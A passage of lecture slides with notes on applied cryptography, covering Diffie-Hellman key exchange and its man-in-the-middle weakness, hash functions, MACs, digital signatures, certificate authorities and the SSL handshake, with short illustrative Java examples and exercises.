In this slide, we talk about Diffie-Hellman (DH) key exchange, which allows two parties to agree upon a key without ever meeting and without relying on an alternate secure channel. In DH, both Alice and Bob execute the protocol using public parameters g and p that everyone knows: p is a (large) prime number, and g is a “generator,” meaning that the successive powers g^1, g^2, … produce all the numbers 1 to p-1. After these two public parameters have been chosen, any two parties that know them can participate in a key exchange. Alice generates a random number a, and Bob generates a random number b; a and b are used to create a key that will be known only to Alice and Bob, even if a passive eavesdropper can view the contents of their conversation. After Alice and Bob choose a and b, respectively, they do not transmit a or b to each other. Instead, Alice transmits g^a mod p to Bob, and Bob transmits g^b mod p to Alice. Alice takes the g^b mod p that she received and raises it to the power a, computing g^(ba) mod p. Bob takes the g^a mod p that he received and raises it to the power b, computing g^(ab) mod p. Now Alice and Bob both know g^(ab) (since g^(ba) = g^(ab)), and that is the key they share. Can Eve possibly have computed g^(ab) by eavesdropping? The answer is no: Eve saw g^a and g^b go across the wire, and Eve could multiply these two numbers together, but that gives Eve g^(a+b), not g^(ab)! As a result, Alice and Bob are able to agree upon a key even if the channel is susceptible to eavesdropping. However, while DH is not susceptible to passive eavesdropping, in which the attacker can only listen to the information going by on the wire, DH is susceptible to active eavesdropping, in which the attacker is also capable of modifying the messages. Eve can compute (g^a)(g^b) = g^(a+b) mod p, but that's not the secret key!
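The exchange is two modPow calls per side. A toy BigInteger sketch of our own (g = 2 over a random prime is for illustration only; real deployments use standardized, vetted (p, g) groups):

import java.math.BigInteger;
import java.security.SecureRandom;

public class ToyDH {
    public static void main(String[] args) {
        SecureRandom rnd = new SecureRandom();
        BigInteger p = BigInteger.probablePrime(512, rnd); // public prime
        BigInteger g = BigInteger.valueOf(2);              // public base

        BigInteger a = new BigInteger(256, rnd);  // Alice's secret
        BigInteger b = new BigInteger(256, rnd);  // Bob's secret

        BigInteger A = g.modPow(a, p);            // Alice sends g^a mod p
        BigInteger B = g.modPow(b, p);            // Bob sends g^b mod p

        // Both sides derive the same g^(ab) mod p
        System.out.println(B.modPow(a, p).equals(A.modPow(b, p))); // true
    }
}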

392 14.4.2. Man-in-the-Middle Attack against DH
Protocol under attack: Alice chooses a and sends g^a, but Mallory intercepts it, chooses m, and sends g^m to Bob instead; Bob chooses b and sends g^b, which Mallory also intercepts, again sending g^m to Alice. Alice computes (g^m)^a, Bob computes (g^m)^b, and Mallory computes both (g^a)^m and (g^b)^m. Alice's "secret" key is g^am; Bob's is g^bm.
Let's look at how an attacker can construct a "man-in-the-middle" attack against DH. Say that Mallory is able to listen to the communications exchanged between Alice and Bob and is able to modify their contents. We will see that Mallory can fool Alice into thinking that she has successfully participated in a key exchange with Bob, and that Bob can be fooled into thinking that he has successfully participated in a key exchange with Alice. The protocol starts off as before, with Alice choosing a secret random number a. Alice sends g^a to Bob, but Mallory intercepts it. Mallory chooses a secret random number m and sends g^m to Bob instead of g^a. As a result, Bob receives g^m. Bob also attempts to engage in the protocol as expected: he generates g^b and attempts to send it to Alice. Unfortunately, Mallory intercepts g^b as well, and replaces it with g^m, sending g^m to Alice. Alice ends up computing g^ma, and Bob ends up computing g^mb. Mallory can compute both g^ma and g^mb. As a result, Mallory will be able to see any message that Alice attempts to send to Bob using the secret key g^ma, and any message that Bob attempts to send to Alice using the secret key g^mb. Mallory is the "man-in-the-middle" and can impersonate either Alice or Bob. While we have shown that we can do a key exchange using DH, this method is unfortunately susceptible to a man-in-the-middle attack. How can we do a key exchange that is resilient to this attack? Mallory can see all communication between Alice & Bob!

393 14.4.2. Detecting Man-in-the-Middle Attack
Both Alice and Bob can compute a hash of the shared secret, h(g^ab), and display it Mallory's secret key with Bob differs from Mallory's key with Alice (g^am ≠ g^bm), so the hashes differ too If the displayed hashes don't match, there must have been a man in the middle! Proposed by P. Zimmermann in the VoIP protocol ZRTP

394 Summary Key Management consists of generation, storage, and agreement/exchange Key Types: Identity, Session, Integrity Key Generation: the problem is random number generation; use device files or the SecureRandom Java API Key Storage: use external devices Key Exchange: public-key crypto or DH – guard against the man-in-the-middle attack

395 CHAPTER 15 MACs and Signatures

396 Agenda Secure Hash Functions Message Authentication Codes (MACs)
Block cipher based (CBC-MAC) Hash-function based (HMAC) Both require sender & receiver to share a key Digital signatures – allow anyone (without a shared key) to verify the sender of a message

397 15.1. Secure Hash Functions Given arbitrary-length input M, produce fixed-length output (message digest) H(M), such that: Efficiency: easy to compute H One-way/Pre-image resistance: given H(M), hard to compute a pre-image M Collision resistance: hard to find M1 ≠ M2 such that H(M1) = H(M2) Diagram: M → H → MD = H(M) If you are coming from a computer science background, you may have heard of hash functions before. Hash functions, as used in the world of cryptography, have some similarities to and differences from other types of hash functions. Like "regular" hash functions, a cryptographic hash function takes as input some (potentially large) message M. It then computes a "message digest" h(M) with the property that if two input messages M1 and M2 are different, there is an overwhelmingly high probability that the two hashes h(M1) and h(M2) will be different. A hash function that simply adds the ASCII values of the characters in the message together does not have this property, because "AB" and "BA" will have the same hash value even though they are different messages. Cryptographic hash functions use much more sophisticated techniques to ensure this property. The requirements that a cryptographic (secure) hash function must satisfy are three-fold: Efficient: computing h(M) must be very efficient. One-way (pre-image resistant): given a message digest MD = h(M), it must be very hard to compute the original message M. Collision resistant: it must be very hard to find two distinct messages M1 ≠ M2 with h(M1) = h(M2); a related, weaker property (second pre-image resistance) is that given M, it is hard to find another message M' with h(M') = h(M). MD = Message Digest

398 15.1. Secure Hash Functions Examples
Non-Examples: Add ASCII values (collisions): H('AB') = H('BA') Checksums (e.g. CRC32): not one-way or collision-resistant MD5: "Message Digest 5", invented by Rivest Input: multiple of 512 bits (padded) Output: 128 bits SHA1: developed by NIST & NSA Input: same as MD5 (multiples of 512 bits) Output: 160 bits Two popular hash functions that are used in many systems are MD5 and SHA-1.
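A quick Java illustration of the contrast with the add-the-ASCII-values non-example; SHA-256 is used here because, as noted later in this chapter, MD5 and SHA-1 should no longer be relied upon:

```java
import java.security.MessageDigest;
import java.util.Arrays;

public class HashDemo {
    public static void main(String[] args) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        byte[] d1 = md.digest("AB".getBytes("UTF-8"));
        byte[] d2 = md.digest("BA".getBytes("UTF-8"));
        // A sum-of-ASCII "hash" would collide on these two inputs;
        // a secure hash function gives completely different digests.
        System.out.println(Arrays.equals(d1, d2)); // false
        System.out.println(d1.length);             // 32 bytes = 256 bits
    }
}
```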

399 15.2. MACs Used to determine sender of message
If Alice and Bob share key k, then Alice sends message M with MAC tag t = MAC(M, k) When Bob receives M' and t', he can check whether the message or tag has been tampered with by verifying that t' = MAC(M', k)

400 15.2.1. CBC MACs Encrypt message with block cipher in CBC mode
IV = 0; the last encrypted block can serve as the tag Insecure for variable-length messages Diagram: each block Mi is XORed with the previous ciphertext block and encrypted with AES under k; the final ciphertext block is the tag
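A minimal Java sketch of the construction, assuming a fixed two-block message; this illustrates the mechanics only, since plain CBC-MAC is insecure for variable-length messages as noted above (and the hard-coded demo key is not how keys should be managed):

```java
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.Arrays;

public class CbcMacDemo {
    public static void main(String[] args) throws Exception {
        byte[] key = "0123456789abcdef".getBytes("US-ASCII"); // demo key only
        byte[] msg = new byte[32]; // exactly two 16-byte AES blocks

        // CBC encryption with IV = 0; we keep only the last ciphertext block
        Cipher aes = Cipher.getInstance("AES/CBC/NoPadding");
        aes.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"),
                 new IvParameterSpec(new byte[16]));
        byte[] ct = aes.doFinal(msg);

        byte[] tag = Arrays.copyOfRange(ct, ct.length - 16, ct.length);
        System.out.println(tag.length); // the 16-byte CBC-MAC tag
    }
}
```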

401 15.2.2. HMAC Secure hash function to compute MAC
A hash function takes a message as input, while a MAC takes a message and a key Simply prepending the key onto the message is not secure enough (e.g. given the MAC of M, an attacker can compute the MAC of M||N for a desired N) Def: HMAC(k, M) = H((K ⊕ opad) || H((K ⊕ ipad) || M)), where K is the key k padded with zeros, and opad, ipad are hexadecimal constants
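The JDK exposes HMAC directly through javax.crypto.Mac, so application code never handles the opad/ipad constants itself. A minimal sketch (the hard-coded key is for illustration only):

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.security.MessageDigest;

public class HmacDemo {
    public static void main(String[] args) throws Exception {
        byte[] key = "0123456789abcdef".getBytes("US-ASCII"); // demo key only
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        byte[] tag = mac.doFinal("Hello Alice".getBytes("UTF-8"));

        // The receiver recomputes the tag over the received message and
        // compares in constant time to avoid timing side channels.
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        byte[] expected = mac.doFinal("Hello Alice".getBytes("UTF-8"));
        System.out.println(MessageDigest.isEqual(tag, expected)); // true
    }
}
```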

402 15.3. Signatures (1) Two major operations (P = principal):
Sign(M, k) – M is the message Verify(M, sig, P) – sig is the signature to be verified Signature: a sequence of bits produced by Sign() such that Verify(M, sig, P) ⇔ (sig == Sign(M, k)) Non-repudiable evidence that P signed M Many applications: SSL, signing binary code, authenticating the source of … Uses asymmetric encryption operations F & F^-1

403 15.3. Signatures (2) S() & V(): implement the sign & verify functions
Signature: s = S(M, ks) = F^-1(h(M), ks) – "decrypt" the hash with the secret key; only the signer (the principal holding the secret key) can sign Verify: V(M, s, kp) = (F(s, kp) == h(M)) – "encrypting" with the public key allows anyone to verify a signature Need to bind a principal's identity to their public key
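In Java, F, F^-1, and the hash are packaged together behind java.security.Signature. A minimal sketch (the algorithm and key size are illustrative choices):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class SignDemo {
    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair kp = kpg.generateKeyPair(); // public key kp, secret key ks
        byte[] msg = "transfer $100 to Bob".getBytes("UTF-8");

        // Sign: hash M, then transform the hash with the secret key
        Signature signer = Signature.getInstance("SHA256withRSA");
        signer.initSign(kp.getPrivate());
        signer.update(msg);
        byte[] sig = signer.sign();

        // Verify: anyone holding the public key can check the signature
        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(kp.getPublic());
        verifier.update(msg);
        System.out.println(verifier.verify(sig)); // true
    }
}
```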

404 15.3.1. Certificates & CAs (1) A principal needs a certificate from a CA (i.e. the CA's digital signature) to bind his identity to his public key The CA must first sign its own certificate, attesting to its own identity ("root") Certificate C(P) is stored as text: name of principal P, public key kp(P), expiration date C(P) = (Ctext(P), Csig(P)) The root certificate C(CA) looks like: Ctext(CA) = ("CA", kp(CA), exp) Csig(CA) = S(Ctext(CA), ks(CA))

405 15.3.1. Certificates & CAs (2) Alice constructs certificate text:
Ctext(Alice) = ("Alice", kp(Alice), exp) She authenticates herself to the CA (through an "out-of-band" mechanism such as a driver's license) The CA signs Alice's certificate: Csig(Alice) = S(Ctext(Alice), ks(CA)) Alice now has the public-key certificate C(Alice) = (Ctext(Alice), Csig(Alice)) She can use it to prove that kp(Alice) is her public key

406 15.3.2. Signing and Verifying
Signing: sig = Sign(M, ks(P)) = (S(M, ks(P)), C(P)) – compute S() with the secret key (sig.S) and append the certificate (sig.C)
Verifying: Verify(M, sig, P) =
V(M, sig.S, kp(P)) – signature verifies message?
& V(sig.Ctext(P), sig.Csig(P), kp(CA)) – certificate signed by CA?
& (sig.Ctext(P).name == P) – name matches on cert?
& (today < sig.Ctext(P).date) – certificate not expired?
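A sketch of those four checks using the JDK's certificate types; the method and variable names here are hypothetical, and a real verifier would also walk the full certificate chain and check revocation:

```java
import java.security.PublicKey;
import java.security.Signature;
import java.security.cert.X509Certificate;
import java.util.Date;

public class VerifyDemo {
    // Verify a message signature plus the signer's certificate
    // against an already-trusted CA public key.
    static boolean verifySigned(byte[] message, byte[] sigBytes,
                                X509Certificate signerCert, PublicKey caKey,
                                String expectedName) throws Exception {
        signerCert.verify(caKey);             // signed by CA? (throws if not)
        signerCert.checkValidity(new Date()); // not expired? (throws if so)
        if (!signerCert.getSubjectX500Principal().getName()
                       .contains("CN=" + expectedName))
            return false;                     // name matches on cert?
        Signature v = Signature.getInstance("SHA256withRSA");
        v.initVerify(signerCert.getPublicKey());
        v.update(message);
        return v.verify(sigBytes);            // signature verifies message?
    }
}
```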

407 15.3.3. Registration Authorities
Authenticating every principal can burden the CA The CA can authorize an RA to authenticate principals on its behalf The CA signs a certificate binding the RA's identity to its public key A signature now includes the RA's certificate too There may be many intermediaries in the verification process starting from the "root" CA certificate The more links in the chain, the more weak points: be careful when verifying signatures Ex: IE would not verify intermediate certificates and would trust arbitrary domains (anyone could sign)

408 Web of Trust Pretty Good Privacy (PGP): digital signatures can be used to sign … "Web of trust" model: users sign their own certificates and others' certificates to establish trust Two unknown people can find a certificate chain to a common person trusted by both

409 15.4. Attacks Against Hash Functions
Researchers have been able to obtain collisions for some hash functions Collision against SHA-1: 2^63 computations (NIST recommends phasing it out by 2010 in favor of e.g. SHA-256) MD5 is seriously compromised: phase it out now! Collision attacks can't fake arbitrary digital signatures (that would require finding pre-images) However, an attacker could create 2 documents with the same hash, have one signed, and claim the other was signed

410 15.5. SSL Handshake: the steps client & server perform before exchanging sensitive app-level data Goal of handshake: client & server agree on a master secret used for symmetric crypto Two round trips: 1st trip is the "hello" messages: which versions of SSL and which cryptographic algorithms are supported 2nd varies based on server-only or mutual authentication

411 15.5.1. Server-Authenticated Only (1)
Client creates a random pre-master secret and encrypts it with the server's public key Server decrypts it with its own private key Both compute hashes, including the random bytes exchanged in the "hello" messages, to create the master secret From the master secret, a symmetric session key and an integrity key are derived (as specified by SSL) Application data is encrypted with the symmetric key
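From application code, all of these steps are hidden behind the platform's SSL/TLS library. A minimal Java client sketch (example.com stands in for a real server):

```java
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;
import java.io.OutputStream;

public class TlsClientDemo {
    public static void main(String[] args) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        try (SSLSocket sock = (SSLSocket) factory.createSocket("example.com", 443)) {
            // Hellos, certificate verification, key exchange, and key
            // derivation all happen inside this call.
            sock.startHandshake();
            OutputStream out = sock.getOutputStream();
            out.write("GET / HTTP/1.0\r\nHost: example.com\r\n\r\n".getBytes("US-ASCII"));
            out.flush();
            // Application data now flows encrypted under the derived session key
            System.out.println(sock.getInputStream().read()); // first response byte
        }
    }
}
```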

412 15.5.1. Server-Authenticated Only (2)
1. Client → Server: ClientHello
2. Server → Client: ServerHello, Certificate, ServerHelloDone
3. Client → Server: ClientKeyExchange, ChangeCipherSpec, Finished
4. Server → Client: ChangeCipherSpec, Finished
5. Both directions: Application Data

413 15.5.2. Mutual Authentication (1)
Client also sends its own certificate to the server Sends a CertificateVerify message to allow the server to authenticate the client's public key Once the pre-master secret is set, compute the master secret Derive symmetric keys & exchange data SSL's mechanisms prevent many attacks (e.g. man-in-the-middle) and include performance optimizations (e.g. caching security parameters)

414 15.5.2. Mutual Authentication (2)
1. Client → Server: ClientHello
2. Server → Client: ServerHello, Certificate, CertificateRequest, ServerHelloDone
3. Client → Server: Certificate, ClientKeyExchange, CertificateVerify, ChangeCipherSpec, Finished
4. Server → Client: ChangeCipherSpec, Finished
5. Both directions: Application Data

415 Summary MACs - protect integrity of messages
Compute a tag to detect tampering Ex: CBC-MAC, HMAC (relies on secure hashes) Signatures – bind messages to senders Allow anyone to verify the sender Prevent forged signatures Use CAs to bind identities to public keys Or use the Web of Trust model Application: SSL ("putting it all together") Relies on cryptography: symmetric & public-key And on MACs & signatures

416 CHAPTER 16 Exercises for Part 3

417 Conceptual Exercises List three advantages/disadvantages of using a web of trust model vs. using a certificate authority–based trust model. State how you can use symmetric encryption to achieve (a) authentication, (b) confidentiality, and (c) message integrity.

418 Programming Problem Extend the AESEncrypter program of Section to compute and verify a MAC on the message in addition to encrypting and decrypting data. Be sure to use different keys for the encryption and MAC computations.

